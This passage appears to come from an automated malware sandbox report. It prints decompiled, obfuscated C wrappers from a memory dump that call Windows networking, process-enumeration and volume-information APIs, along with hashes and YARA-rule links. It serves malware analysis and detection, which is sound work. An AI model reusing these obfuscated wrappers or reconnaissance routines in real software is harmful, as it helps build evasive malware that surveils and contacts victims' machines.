				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* _t52;
				int _t63;
				signed int _t65;
				signed int _t66;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E04822523(_t52);
				_v24 = _v24 & 0x00000000;
				_v28 = 0x6eade3;
				_v20 = 0x70ee4c;
				_v20 = _v20 + 0xffffd19f;
				_v20 = _v20 ^ 0x007528c6;
				_v16 = 0x80bb49;
				_v16 = _v16 + 0xffff2cb2;
				_v16 = _v16 >> 4;
				_t65 = 0x3d;
				_v16 = _v16 / _t65;
				_v16 = _v16 ^ 0x000cd3d3;
				_v12 = 0x49bca9;
				_v12 = _v12 + 0x284b;
				_v12 = _v12 + 0x352d;
				_v12 = _v12 ^ 0x5aa1db04;
				_v12 = _v12 ^ 0x5aee1bd2;
				_v8 = 0xbb5f19;
				_v8 = _v8 << 9;
				_v8 = _v8 | 0x616a7bee;
				_t39 =  &_v8; // 0x616a7bee
				_t66 = 0x5f;
				_v8 =  *_t39 / _t66;
				_v8 = _v8 ^ 0x01468cd5;
				E04802309(_t66 + 0x22, _t66, _t66, 0x1d483158, _t66, 0xc0cf1a4);
				_t63 = InternetCloseHandle(_a12); // executed
				return _t63;
			}

0x048054e0
0x048054e3
0x048054e6
0x048054eb
0x048054f0
0x048054f7
0x04805500
0x04805507
0x0480550e
0x04805515
0x0480551c
0x04805523
0x0480552c
0x04805531
0x04805536
0x0480553d
0x04805544
0x0480554b
0x04805552
0x04805559
0x04805560
0x04805567
0x0480556b
0x04805572
0x04805575
0x0480557d
0x04805580
0x0480559e
0x048055a9
0x048055ae

APIs

InternetCloseHandle.WININET(007528C6), ref: 048055A9

Strings

{ja, xrefs: 04805572
Lp, xrefs: 04805500
-5, xrefs: 0480554B

Memory Dump Source

Source File: 00000008.00000002.1189352214.0000000004801000.00000020.00000001.sdmp, Offset: 04800000, based on PE: true

Associated: 00000008.00000002.1189345400.0000000004800000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.1189386614.0000000004825000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.1189394029.0000000004827000.00000002.00000001.sdmp Download File

Similarity

API ID: CloseHandleInternet
String ID: -5$Lp${ja
API String ID: 1081599783-1222928185
Opcode ID: 96c25ca98efac3a213f8ce2c5c378593396d62ac674d19cb573e17f5676fb90f
Instruction ID: d7585afd6c71cb2eddfb97b6ab534505658279a7508c68232daaa24a2cfefea0
Opcode Fuzzy Hash: 96c25ca98efac3a213f8ce2c5c378593396d62ac674d19cb573e17f5676fb90f
Instruction Fuzzy Hash: 752107B5D0120DEBEF44DFE5C94A5AEBBB1FB10318F10C199E410A6250E3B55B54CF51

Uniqueness

Uniqueness Score: -1.00%

Function 0481F606, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E0481F606(void* __ecx, void* __edx, struct tagPROCESSENTRY32W* _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				void* _t43;
				void* _t50;
				void* _t54;

				_push(_a8);
				_t54 = __edx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E04822523(_t43);
				_v28 = _v28 & 0x00000000;
				_v24 = _v24 & 0x00000000;
				_v32 = 0xf33a94;
				_v8 = 0x16e1c5;
				_v8 = _v8 << 0x10;
				_v8 = _v8 + 0xffff7501;
				_v8 = _v8 * 0x3d;
				_v8 = _v8 ^ 0xcbc2f299;
				_v20 = 0x18380a;
				_v20 = _v20 + 0x556a;
				_v20 = _v20 ^ 0x2e444359;
				_v20 = _v20 ^ 0x2e5734c8;
				_v16 = 0x1de0f;
				_v16 = _v16 + 0xffff3d0f;
				_v16 = _v16 ^ 0x5b4c4104;
				_v16 = _v16 ^ 0x5b45396c;
				_v12 = 0x8d2c67;
				_v12 = _v12 | 0x6bb36e73;
				_v12 = _v12 ^ 0x44de99d4;
				_v12 = _v12 ^ 0x2f6e43e4;
				_t50 = E04802309(0x343, __ecx, __ecx, 0x1a63a552, __ecx, 0x9c9047d0);
				Process32FirstW(_t54, _a4); // executed
				return _t50;
			}

0x0481f60d
0x0481f610
0x0481f612
0x0481f615
0x0481f616
0x0481f617
0x0481f61c
0x0481f623
0x0481f627
0x0481f62e
0x0481f635
0x0481f639
0x0481f650
0x0481f653
0x0481f65a
0x0481f661
0x0481f668
0x0481f66f
0x0481f676
0x0481f67d
0x0481f684
0x0481f68b
0x0481f692
0x0481f699
0x0481f6a0
0x0481f6a7
0x0481f6c0
0x0481f6cc
0x0481f6d2

APIs

Process32FirstW.KERNEL32(00000000,2F6E43E4,?,?,?,?,?,?,?,?,00000000), ref: 0481F6CC

Strings

Cn/, xrefs: 0481F6A7
l9E[, xrefs: 0481F68B
YCD., xrefs: 0481F668

Memory Dump Source

Source File: 00000008.00000002.1189352214.0000000004801000.00000020.00000001.sdmp, Offset: 04800000, based on PE: true

Associated: 00000008.00000002.1189345400.0000000004800000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.1189386614.0000000004825000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.1189394029.0000000004827000.00000002.00000001.sdmp Download File

Similarity

API ID: FirstProcess32
String ID: YCD.$l9E[$Cn/
API String ID: 2623510744-4191728293
Opcode ID: ba6908419aca7e40de5752100cf2159fdf1c013576c21fa5a45c6b552e88f8aa
Instruction ID: 8db457f4b8433cd5f9f6581bc190f421ce7780b394b8bf5e6e442d0eda1ddf50
Opcode Fuzzy Hash: ba6908419aca7e40de5752100cf2159fdf1c013576c21fa5a45c6b552e88f8aa
Instruction Fuzzy Hash: FC2133B6C01219EBDF08DFE8D9899AEBBB4FF10715F108689E415B6210D3B45B50DF91

Uniqueness

Uniqueness Score: -1.00%

Function 0481A809, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 55%

			E0481A809(DWORD* __ecx, void* __edx, intOrPtr _a12, WCHAR* _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a40, intOrPtr _a44) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				WCHAR* _v24;
				WCHAR* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t45;
				int _t55;
				DWORD* _t60;

				_t60 = __ecx;
				_push(0);
				_push(0);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(0);
				_push(0);
				_push(__ecx);
				E04822523(_t45);
				_v36 = 0x72e62c;
				_v32 = 0x6afee3;
				_v28 = 0;
				_v24 = 0;
				_v12 = 0x241442;
				_v12 = _v12 ^ 0x5f0a7563;
				_v12 = _v12 * 0x4b;
				_v12 = _v12 + 0xffff00d5;
				_v12 = _v12 ^ 0xe298fffa;
				_v20 = 0x629ccf;
				_v20 = _v20 + 0xa262;
				_v20 = _v20 ^ 0x006504c5;
				_v8 = 0x8dfd52;
				_v8 = _v8 * 0x5f;
				_v8 = _v8 >> 0xe;
				_v8 = _v8 << 0xd;
				_v8 = _v8 ^ 0x1a5bea6c;
				_v16 = 0x13a484;
				_v16 = _v16 * 0x42;
				_v16 = _v16 ^ 0x051e7b21;
				E04802309(0x1c8, __ecx, __ecx, 0xfc0d3d9c, __ecx, 0x9c9047d0);
				_t55 = GetVolumeInformationW(_a16, 0, 0, _t60, 0, 0, 0, 0); // executed
				return _t55;
			}

0x0481a813
0x0481a815
0x0481a816
0x0481a817
0x0481a81a
0x0481a81d
0x0481a81e
0x0481a81f
0x0481a822
0x0481a825
0x0481a828
0x0481a82b
0x0481a82e
0x0481a82f
0x0481a831
0x0481a832
0x0481a837
0x0481a841
0x0481a848
0x0481a84b
0x0481a84e
0x0481a855
0x0481a86c
0x0481a86f
0x0481a876
0x0481a87d
0x0481a884
0x0481a88b
0x0481a892
0x0481a8a3
0x0481a8a6
0x0481a8aa
0x0481a8ae
0x0481a8b5
0x0481a8c0
0x0481a8c3
0x0481a8d6
0x0481a8e8
0x0481a8ef

APIs

GetVolumeInformationW.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 0481A8E8

Strings

,r, xrefs: 0481A837
cu_, xrefs: 0481A855

Memory Dump Source

Source File: 00000008.00000002.1189352214.0000000004801000.00000020.00000001.sdmp, Offset: 04800000, based on PE: true

Associated: 00000008.00000002.1189345400.0000000004800000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.1189386614.0000000004825000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.1189394029.0000000004827000.00000002.00000001.sdmp Download File

Similarity

API ID: InformationVolume
String ID: ,r$cu_
API String ID: 2039140958-355032270
Opcode ID: 11f0a768391377fe69868ce35b1527178b61e9fcd2d284546a7f3ae16540a2da
Instruction ID: d70db4f0aa567f2ddfb0dab29fcf6b56446645f703ac80269add0dc82110b84b
Opcode Fuzzy Hash: 11f0a768391377fe69868ce35b1527178b61e9fcd2d284546a7f3ae16540a2da
Instruction Fuzzy Hash: 152103B1801249BBCF14CFA6DD49CDFBFB9EB86704F108199F810A2220D3B59A14DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0480BEDE, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57COMMON

Download Yara Rule

APIs

QueryFullProcessImageNameW.KERNEL32(007CD4C5,00000000,00000000,31305EC1), ref: 0480BFB0

Strings

=., xrefs: 0480BF6D
^.c, xrefs: 0480BF25

Memory Dump Source

Source File: 00000008.00000002.1189352214.0000000004801000.00000020.00000001.sdmp, Offset: 04800000, based on PE: true

Associated: 00000008.00000002.1189345400.0000000004800000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.1189386614.0000000004825000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.1189394029.0000000004827000.00000002.00000001.sdmp Download File

Similarity

API ID: FullImageNameProcessQuery
String ID: =.$^.c
API String ID: 3578328331-3776521896
Opcode ID: 07ae75dd8ddba432c77965de32a51c1b19153ce4c2545f6c391e89c1662625bf
Instruction ID: c2092d2c73b84f91ecbe33119db2d3f1fc7ec407e50f902e013352585b9410e7
Opcode Fuzzy Hash: 07ae75dd8ddba432c77965de32a51c1b19153ce4c2545f6c391e89c1662625bf
Instruction Fuzzy Hash: 8B210475C00209BBDF59DFA4C94AAEEBFB1FB44704F208588E914B6260D3B19B619F91

Uniqueness

Uniqueness Score: -1.00%

Function 0480FBFA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E0480FBFA(void* __ecx, void* __edx, intOrPtr _a4, void* _a8) {
				unsigned int _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t48;
				int _t57;
				signed int _t59;

				_push(_a8);
				_push(_a4);
				E04822523(_t48);
				_v28 = _v28 & 0x00000000;
				_v24 = _v24 & 0x00000000;
				_v36 = 0x49672e;
				_v32 = 0xb6dd69;
				_v16 = 0x714492;
				_v16 = _v16 >> 4;
				_v16 = _v16 + 0x8cae;
				_v16 = _v16 + 0xf12f;
				_v16 = _v16 ^ 0x0001c43a;
				_v20 = 0xe1aff5;
				_v20 = _v20 + 0x563d;
				_v20 = _v20 ^ 0x00ec4f92;
				_v12 = 0xff415;
				_v12 = _v12 + 0x39cf;
				_v12 = _v12 | 0x79f6ff5d;
				_v12 = _v12 ^ 0x79f7d296;
				_v8 = 0xdebe32;
				_t59 = 0x1e;
				_v8 = _v8 / _t59;
				_v8 = _v8 >> 0xe;
				_v8 = _v8 >> 0xe;
				_v8 = _v8 ^ 0x0002d9b6;
				E04802309(0x336, _t59, _t59, 0xd09d8658, _t59, 0x9c9047d0);
				_t57 = FindClose(_a8); // executed
				return _t57;
			}

0x0480fc00
0x0480fc03
0x0480fc08
0x0480fc0d
0x0480fc14
0x0480fc1a
0x0480fc21
0x0480fc28
0x0480fc2f
0x0480fc33
0x0480fc3a
0x0480fc41
0x0480fc48
0x0480fc4f
0x0480fc56
0x0480fc5d
0x0480fc64
0x0480fc6b
0x0480fc72
0x0480fc79
0x0480fc85
0x0480fc8d
0x0480fc90
0x0480fc94
0x0480fc98
0x0480fcb8
0x0480fcc3
0x0480fcc8

APIs

FindClose.KERNEL32(0001C43A), ref: 0480FCC3

Strings

.gI, xrefs: 0480FC1A
=V, xrefs: 0480FC4F

Memory Dump Source

Source File: 00000008.00000002.1189352214.0000000004801000.00000020.00000001.sdmp, Offset: 04800000, based on PE: true

Associated: 00000008.00000002.1189345400.0000000004800000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.1189386614.0000000004825000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.1189394029.0000000004827000.00000002.00000001.sdmp Download File

Similarity

API ID: CloseFind
String ID: .gI$=V
API String ID: 1863332320-2530093900
Opcode ID: 110af252eeec9babbf3e3997d431909c73a56f909e67471b0c3fb51db6a30985
Instruction ID: 25bb0da83e35bf670924a5c67227800661cb3945316fa6ba728cd1ba5c090f80
Opcode Fuzzy Hash: 110af252eeec9babbf3e3997d431909c73a56f909e67471b0c3fb51db6a30985
Instruction Fuzzy Hash: A12147B1D0020CEFEB44DFD5C94AAEEBBB0FB54318F10C599E524A6240E3B95B549F90

Uniqueness

Uniqueness Score: -1.00%

Function 0481E9E8, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50
fileCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E0481E9E8(void* __ecx, void* __edx, struct _WIN32_FIND_DATAW* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* _t39;
				int _t47;
				void* _t51;

				_push(_a16);
				_t51 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E04822523(_t39);
				_v24 = _v24 & 0x00000000;
				_v28 = 0x7dd1c2;
				_v20 = 0xe6ed41;
				_v20 = _v20 ^ 0x6eedbecd;
				_v20 = _v20 * 0x45;
				_v20 = _v20 ^ 0xa90eba26;
				_v16 = 0x25fde1;
				_v16 = _v16 + 0xffffc5d1;
				_v16 = _v16 | 0x325ad611;
				_v16 = _v16 ^ 0x3277e624;
				_v8 = 0x448e1b;
				_v8 = _v8 | 0xd7f3ffef;
				_v8 = _v8 ^ 0xcff08007;
				_v8 = _v8 ^ 0x180d74c6;
				_v12 = 0x3a9cbc;
				_v12 = _v12 | 0xfe729dd7;
				_v12 = _v12 ^ 0xfe7a3202;
				E04802309(0x2de, __ecx, __ecx, 0xa7d3fbc8, __ecx, 0x9c9047d0);
				_t47 = FindNextFileW(_t51, _a4); // executed
				return _t47;
			}

0x0481e9ef
0x0481e9f2
0x0481e9f4
0x0481e9f7
0x0481e9fa
0x0481e9fe
0x0481e9ff
0x0481ea04
0x0481ea0b
0x0481ea12
0x0481ea19
0x0481ea30
0x0481ea33
0x0481ea3a
0x0481ea41
0x0481ea48
0x0481ea4f
0x0481ea56
0x0481ea5d
0x0481ea64
0x0481ea6b
0x0481ea72
0x0481ea79
0x0481ea80
0x0481ea99
0x0481eaa5
0x0481eaab

APIs

FindNextFileW.KERNELBASE(00000000,FE7A3202,?,?,?,?,?,?,?,?,?,?,00000072), ref: 0481EAA5

Strings

$w2, xrefs: 0481EA4F
A, xrefs: 0481EA12

Memory Dump Source

Source File: 00000008.00000002.1189352214.0000000004801000.00000020.00000001.sdmp, Offset: 04800000, based on PE: true

Associated: 00000008.00000002.1189345400.0000000004800000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.1189386614.0000000004825000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.1189394029.0000000004827000.00000002.00000001.sdmp Download File

Similarity

API ID: FileFindNext
String ID: $w2$A
API String ID: 2029273394-2068021171
Opcode ID: 489ae82eb01001db2e27a8813198e8620566e78ec9ea4fd3dbf43d66dbc97652
Instruction ID: dc64f93cefa01ed798d994ef95f4b1f206e02792a6d032c4816d1086cba82264
Opcode Fuzzy Hash: 489ae82eb01001db2e27a8813198e8620566e78ec9ea4fd3dbf43d66dbc97652
Instruction Fuzzy Hash: AF1112B1C0121DAFDF45DFE8DA068AEBFB4FB00304F108689E915B6260E3B55B209F95

Uniqueness

Uniqueness Score: -1.00%

Function 04808A5E, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 68
networkCOMMON

Download Yara Rule

C-Code - Quality: 47%

			E04808A5E(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, long _a24, WCHAR* _a36, intOrPtr _a44, intOrPtr _a48, intOrPtr _a52, WCHAR* _a56) {
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				WCHAR* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t45;
				void* _t52;
				void* _t57;

				_push(_a56);
				_t57 = __edx;
				_push(_a52);
				_push(_a48);
				_push(_a44);
				_push(0);
				_push(_a36);
				_push(0);
				_push(0);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E04822523(_t45);
				_v32 = 0xd5d112;
				_v28 = 0x50513d;
				_v24 = 0;
				_v12 = 0x46c43;
				_v12 = _v12 + 0xffffdfef;
				_v12 = _v12 | 0x9d8b3e1d;
				_v12 = _v12 ^ 0x9d8347af;
				_v20 = 0x816eb9;
				_v20 = _v20 + 0xffff29e2;
				_v20 = _v20 ^ 0x0080c9d8;
				_v8 = 0x807982;
				_v8 = _v8 | 0x5015719e;
				_v8 = _v8 ^ 0xfbfa9e2f;
				_v8 = _v8 ^ 0xab6f9dce;
				_v16 = 0xec1576;
				_v16 = _v16 >> 0xb;
				_v16 = _v16 ^ 0x000e8763;
				E04802309(0x18c, __ecx, __ecx, 0xb50c381d, __ecx, 0xc0cf1a4);
				_t52 = HttpOpenRequestW(_t57, _a36, _a56, 0, 0, 0, _a24, 0); // executed
				return _t52;
			}

0x04808a66
0x04808a6b
0x04808a6d
0x04808a70
0x04808a73
0x04808a76
0x04808a77
0x04808a7a
0x04808a7b
0x04808a7c
0x04808a7f
0x04808a80
0x04808a83
0x04808a86
0x04808a89
0x04808a8c
0x04808a8d
0x04808a8e
0x04808a93
0x04808a9d
0x04808aa4
0x04808aa7
0x04808aae
0x04808ab5
0x04808abc
0x04808ac3
0x04808aca
0x04808ad1
0x04808ad8
0x04808adf
0x04808ae6
0x04808aed
0x04808af4
0x04808afb
0x04808aff
0x04808b24
0x04808b3a
0x04808b41

APIs

HttpOpenRequestW.WININET(?,?,?,00000000,00000000,00000000,00D5D112,00000000), ref: 04808B3A

Strings

=QP, xrefs: 04808A9D

Memory Dump Source

Source File: 00000008.00000002.1189352214.0000000004801000.00000020.00000001.sdmp, Offset: 04800000, based on PE: true

Associated: 00000008.00000002.1189345400.0000000004800000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.1189386614.0000000004825000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.1189394029.0000000004827000.00000002.00000001.sdmp Download File

Similarity

API ID: HttpOpenRequest
String ID: =QP
API String ID: 1984915467-456757808
Opcode ID: 4cc3d4786cdcc23149290c3469cd4bf7c683ba33055c948049ab044fbc38bf75
Instruction ID: 3f6904d7c3b91044072c995b123d0473de42bdced75bf1d602da1fa60cb726da
Opcode Fuzzy Hash: 4cc3d4786cdcc23149290c3469cd4bf7c683ba33055c948049ab044fbc38bf75
Instruction Fuzzy Hash: 5021D0B2801209BB8F559F95CD4ACDFBF79EF85704F108188B914A6220D3B18A65DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 048142E4, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66
memoryCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E048142E4(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				long _v24;
				long _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t43;
				char _t54;
				signed int _t57;
				void* _t62;
				void* _t63;

				_push(_a20);
				_t62 = __edx;
				_push(_a16);
				_t63 = __ecx;
				_push(0);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E04822523(_t43);
				_v36 = 0xead706;
				_v32 = 0x8aaadf;
				_v28 = 0;
				_v24 = 0;
				_v12 = 0x3b6f9b;
				_t57 = 0x3f;
				_v12 = _v12 * 0xe;
				_v12 = _v12 << 0x10;
				_v12 = _v12 ^ 0x1a7fe3f0;
				_v20 = 0x6318b1;
				_v20 = _v20 | 0x2b2fc1f2;
				_v20 = _v20 ^ 0x2b6f417a;
				_v8 = 0xeb56a2;
				_v8 = _v8 << 1;
				_v8 = _v8 / _t57;
				_v8 = _v8 * 0x2f;
				_v8 = _v8 ^ 0x015d5ff9;
				_v16 = 0x2619ef;
				_v16 = _v16 << 6;
				_v16 = _v16 ^ 0x098e35d6;
				E04802309(_t57 + 0x4d, _t57, _t57, 0x52f9059f, _t57, 0x9c9047d0);
				_t54 = RtlFreeHeap(_t62, 0, _t63); // executed
				return _t54;
			}

0x048142ed
0x048142f2
0x048142f4
0x048142f7
0x048142f9
0x048142fa
0x048142fd
0x04814300
0x04814301
0x04814302
0x04814307
0x04814311
0x0481431a
0x0481431d
0x04814320
0x0481432d
0x04814334
0x04814337
0x0481433b
0x04814342
0x04814349
0x04814350
0x04814357
0x0481435e
0x0481436b
0x04814377
0x0481437a
0x04814381
0x04814388
0x0481438c
0x0481439f
0x048143aa
0x048143b2

APIs

RtlFreeHeap.NTDLL(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,072B1AC5,00000000,00000000), ref: 048143AA

Strings

zAo+, xrefs: 04814350

Memory Dump Source

Source File: 00000008.00000002.1189352214.0000000004801000.00000020.00000001.sdmp, Offset: 04800000, based on PE: true

Associated: 00000008.00000002.1189345400.0000000004800000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.1189386614.0000000004825000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.1189394029.0000000004827000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeHeap
String ID: zAo+
API String ID: 3298025750-440923707
Opcode ID: 782d704bb29470d0423d04c6355d4fda0cb05a54fe280a973ff5c90c0f5ad215
Instruction ID: f3e2a0d53e77dfca25f196c2d90c11845068a834b806dc072fc89565dab5898a
Opcode Fuzzy Hash: 782d704bb29470d0423d04c6355d4fda0cb05a54fe280a973ff5c90c0f5ad215
Instruction Fuzzy Hash: CE2148B1C00218BF9B08DF99D98A8EEBFB8FB44344F508199E515A7240D3B05B149B90

Uniqueness

Uniqueness Score: -1.00%

Function 0481A4A0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 19%

			E0481A4A0(void* __ecx, void* __edx, intOrPtr _a4, struct tagPROCESSENTRY32W _a8) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _v32;
				intOrPtr _v36;
				void* _t40;
				int _t49;
				void* _t51;
				void* _t54;

				_push(_a8);
				_t54 = __ecx;
				_push(_a4);
				_push(__ecx);
				E04822523(_t40);
				_v36 = 0x141422;
				asm("stosd");
				_push(0x9c9047d0);
				asm("stosd");
				_push(__ecx);
				_push(0xb41b9fb1);
				_push(__ecx);
				asm("stosd");
				_v20 = 0x6e8e4;
				_v20 = _v20 << 1;
				_push(__ecx);
				_t51 = 0x1c;
				_v20 = _v20 * 0x65;
				_v20 = _v20 ^ 0x05792b89;
				_v8 = 0x17694a;
				_v8 = _v8 >> 0xd;
				_v8 = _v8 + 0x7593;
				_v8 = _v8 + 0x3dc6;
				_v8 = _v8 ^ 0x000c8dea;
				_v16 = 0x6183ab;
				_v16 = _v16 << 3;
				_v16 = _v16 | 0x753fc9cb;
				_v16 = _v16 ^ 0x773f8770;
				_v12 = 0x2bda5d;
				_v12 = _v12 + 0xffff2e51;
				_v12 = _v12 ^ 0x7ae43c2f;
				_v12 = _v12 ^ 0x7acc85af;
				E04802309(_t51);
				_t49 = Process32NextW(_t54, _a8); // executed
				return _t49;
			}

0x0481a4a8
0x0481a4ab
0x0481a4ad
0x0481a4b1
0x0481a4b2
0x0481a4b7
0x0481a4c6
0x0481a4c7
0x0481a4cc
0x0481a4cd
0x0481a4ce
0x0481a4d3
0x0481a4d4
0x0481a4d5
0x0481a4dc
0x0481a4e3
0x0481a4e6
0x0481a4e7
0x0481a4ea
0x0481a4f1
0x0481a4f8
0x0481a4fc
0x0481a503
0x0481a50a
0x0481a511
0x0481a518
0x0481a51c
0x0481a523
0x0481a52a
0x0481a531
0x0481a538
0x0481a53f
0x0481a552
0x0481a55e
0x0481a565

APIs

Process32NextW.KERNEL32(00000000,773F8770,?,?,?,?,?,?,?,?,00000000), ref: 0481A55E

Strings

/<z, xrefs: 0481A538

Memory Dump Source

Source File: 00000008.00000002.1189352214.0000000004801000.00000020.00000001.sdmp, Offset: 04800000, based on PE: true

Associated: 00000008.00000002.1189345400.0000000004800000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.1189386614.0000000004825000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.1189394029.0000000004827000.00000002.00000001.sdmp Download File

Similarity

API ID: NextProcess32
String ID: /<z
API String ID: 1850201408-2186077011
Opcode ID: ee7739c6ebbc081d39b179a51fe32828a234b3ca8a11d0ef1921ab7f81e9d2f1
Instruction ID: be5a1269f43b7c8d409c39d77f7f6781ec34a47ef30459a55197c44091d90359
Opcode Fuzzy Hash: ee7739c6ebbc081d39b179a51fe32828a234b3ca8a11d0ef1921ab7f81e9d2f1
Instruction Fuzzy Hash: E0215675C01219FBDF04CF99C8498DEBBB4FB44314F108589E418A6260D3B86B449F91

Uniqueness

Uniqueness Score: -1.00%

Function 0480F2CC, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 57
networkCOMMON

Download Yara Rule

C-Code - Quality: 24%

			E0480F2CC(void* __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a32) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				WCHAR* _v24;
				intOrPtr _v28;
				void* __ecx;
				void* _t36;
				void* _t44;
				void* _t46;

				_push(_a32);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				E04822523(_t36);
				_v28 = 0x481ca4;
				_v24 = 0;
				_v20 = 0xca1952;
				_v20 = _v20 ^ 0x1684c8f8;
				_v20 = _v20 ^ 0x16482d99;
				_v12 = 0xc193bc;
				_v12 = _v12 ^ 0x27e4a297;
				_v12 = _v12 | 0xa7673761;
				_v12 = _v12 ^ 0xa76f04da;
				_v8 = 0xc5b902;
				_push(0xc0cf1a4);
				_push(_t45);
				_push(0xb325898b);
				_push(_t45);
				_v8 = _v8 * 0x4e;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x03c56f69;
				_v16 = 0x24ec4f;
				_v16 = _v16 + 0xffffc13d;
				_v16 = _v16 ^ 0x002fbbc3;
				_push(_t45);
				_t46 = 0x50;
				E04802309(_t46);
				_t44 = InternetOpenW(0, _a12, 0, 0, 0); // executed
				return _t44;
			}

0x0480f2d3
0x0480f2d8
0x0480f2d9
0x0480f2da
0x0480f2db
0x0480f2dc
0x0480f2df
0x0480f2e2
0x0480f2e7
0x0480f2ec
0x0480f2f6
0x0480f2f9
0x0480f300
0x0480f307
0x0480f30e
0x0480f315
0x0480f31c
0x0480f323
0x0480f32a
0x0480f335
0x0480f33a
0x0480f33b
0x0480f340
0x0480f341
0x0480f344
0x0480f348
0x0480f34f
0x0480f356
0x0480f35d
0x0480f370
0x0480f373
0x0480f374
0x0480f383
0x0480f389

APIs

InternetOpenW.WININET(00000000,16482D99,00000000,00000000,00000000), ref: 0480F383

Strings

O$, xrefs: 0480F34F

Memory Dump Source

Source File: 00000008.00000002.1189352214.0000000004801000.00000020.00000001.sdmp, Offset: 04800000, based on PE: true

Associated: 00000008.00000002.1189345400.0000000004800000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.1189386614.0000000004825000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.1189394029.0000000004827000.00000002.00000001.sdmp Download File

Similarity

API ID: InternetOpen
String ID: O$
API String ID: 2038078732-838329570
Opcode ID: bfd598ea9fc20005dd18c51756325e876dca57c81b5a8b40325e3a3f8c113345
Instruction ID: 01852b5220e8f6e522ec2cc8c355ec4faa0590935381d71789f3e170f46ad13a
Opcode Fuzzy Hash: bfd598ea9fc20005dd18c51756325e876dca57c81b5a8b40325e3a3f8c113345
Instruction Fuzzy Hash: 511124B1C0122DBB9B15DFA5CD4A8DFBFB8EF05754F108589F814B6110C3B15A54DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0480E0A2, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

GetNativeSystemInfo.KERNEL32 ref: 0480E168

Strings

|p, xrefs: 0480E0FA

Memory Dump Source

Source File: 00000008.00000002.1189352214.0000000004801000.00000020.00000001.sdmp, Offset: 04800000, based on PE: true

Associated: 00000008.00000002.1189345400.0000000004800000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.1189386614.0000000004825000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.1189394029.0000000004827000.00000002.00000001.sdmp Download File

Similarity

API ID: InfoNativeSystem
String ID: |p
API String ID: 1721193555-2455131449
